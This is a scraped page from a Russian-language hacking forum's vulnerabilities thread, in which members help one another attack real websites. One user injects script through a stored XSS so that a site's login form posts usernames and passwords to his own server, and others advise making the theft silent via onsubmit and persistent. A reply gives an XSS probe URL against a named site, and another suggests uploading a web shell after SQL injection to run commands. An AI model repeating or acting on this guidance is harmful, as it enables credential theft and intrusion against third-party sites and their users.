HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 43 из 296 « Первая < 33 39 40 41 42 43 44 45 46 47 5393143 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #421  
Старый 04.08.2015, 13:07
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
потому что так работает action. добавьте редирект обратно на форум в вашем base.php
 
Ответить с цитированием

  #422  
Старый 04.08.2015, 14:03
djon
Guest
Сообщений: n/a
Провел на форуме:
2873

Репутация: 0
По умолчанию
Редирект не помагает,вот как происходит;мой хостинг где лежит base.php "МойХостинг.ru/base.php" их сайт "УязвимыйСайт.ru/forum/forum.php" когда нажимаю ВХОД то ничего не происходит,даже в профиль не заходит,смотрю через чарльз что происходит там,и вижу что вместо "МойХостинг.ru/base.php" становится так" УязвимыйСайт.ru/base.php" и в пакете есть логин и пас,но ничего не происходит(((

вот сам base.php

----------------------------------------------------------------

-------------------------------------------------------------------

Я сначала ввожу скрипт вместо ника а в 1.js лежит document.getElementById('lsform').action="http://МойСайт.ru/base.php?";

--------------------------------------------------------------------
 
Ответить с цитированием

  #423  
Старый 05.08.2015, 12:07
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию
Скрипт, скорее всего, нужно выполнять в document onload. Возможно на странице есть ещё какие-то скрипты.

Правильнее было бы сделать скрипт для события onsubmit, который без двойных заметных редиректов отправлял данные к нам на хост. Если XSS не в login.php, пишут скрипты, которые остаются на странице даже после того, как юзер её покинет переходом по ссылке на другую.
 
Ответить с цитированием

  #424  
Старый 05.08.2015, 13:49
djon
Guest
Сообщений: n/a
Провел на форуме:
2873

Репутация: 0
По умолчанию
Я для этой формы скрипт подключаю,есть еще js на их сайте,выглядит так

А в нем вот это

Код:
Code:
function lsSubmit(op) {
    var op = !op ? 0 : op;
    if(op) {
        $('lsform').cookietime.value = 2592000;
    }
    if($('ls_username').value == '' || $('ls_password').value == '') {
        showWindow('login', 'member.php?mod=logging&action=login' + (op ? '&cookietime=1' : ''));
    } else {
        ajaxpost('lsform', 'return_ls', 'return_ls');
    }
    return false;
}

function errorhandle_ls(str, param) {
    if(!param['type']) {
        showError(str);
    }
}
Еще к сылке добавляется inajax, вот так /base.php?&inajax

И уязвимость Активная,и находится где форма авторизации
 
Ответить с цитированием

  #425  
Старый 05.08.2015, 20:48
GusTor
Guest
Сообщений: n/a
Провел на форуме:
1338

Репутация: 0
По умолчанию
Может кто подсказать что можно из этого вытащить?

вот сайт http://www.rostof.ru/article.php?chapter=&id=

а вот скрин скана

http://hkar.ru/CVkO
 
Ответить с цитированием

  #426  
Старый 06.08.2015, 22:43
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию
Цитата:
Сообщение от GusTor  
GusTor said:

Может кто подсказать что можно из этого вытащить?
вот сайт
http://www.rostof.ru/article.php?chapter=&id=
а вот скрин скана
http://hkar.ru/CVkO
Ну там же написано.

Код:
Code:
http://www.rostof.ru/article.php?chapter=&id=">alert()
 
Ответить с цитированием

  #427  
Старый 07.08.2015, 00:00
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию
Цитата:
Сообщение от djon  
djon said:


Вот он - корень всех зол.
 
Ответить с цитированием

  #428  
Старый 07.08.2015, 00:09
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию
Здравствуйте. заранее простите за не корректную формулировку вопроса. Имею sql инъекцию, права рут, ОС виндус, как выполнить команду cmd?
 
Ответить с цитированием

  #429  
Старый 07.08.2015, 00:19
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
Цитата:
Сообщение от BabaDook  
BabaDook said:

Здравствуйте. заранее простите за не корректную формулировку вопроса. Имею sql инъекцию, права рут, ОС виндус, как выполнить команду cmd?
Заливаите шелл и если нужные функции в пхп не отключены то через консоль выполняите нужные вам команды
 
Ответить с цитированием

  #430  
Старый 07.08.2015, 11:20
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию
Цитата:
Сообщение от winstrool  
winstrool said:

Заливаите шелл и если нужные функции в пхп не отключены то через консоль выполняите нужные вам команды
шел залить можно. Но мне интересно именно это. как через sqlmap делать я более мение знаю, а вот как ручками не знаю вообще. Надо привыкать в полевым условиям, когда только я и сайт, а между нами браузер.
 
Ответить с цитированием
Ответ
Страница 43 из 296 « Первая < 33 39 40 41 42 43 44 45 46 47 5393143 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ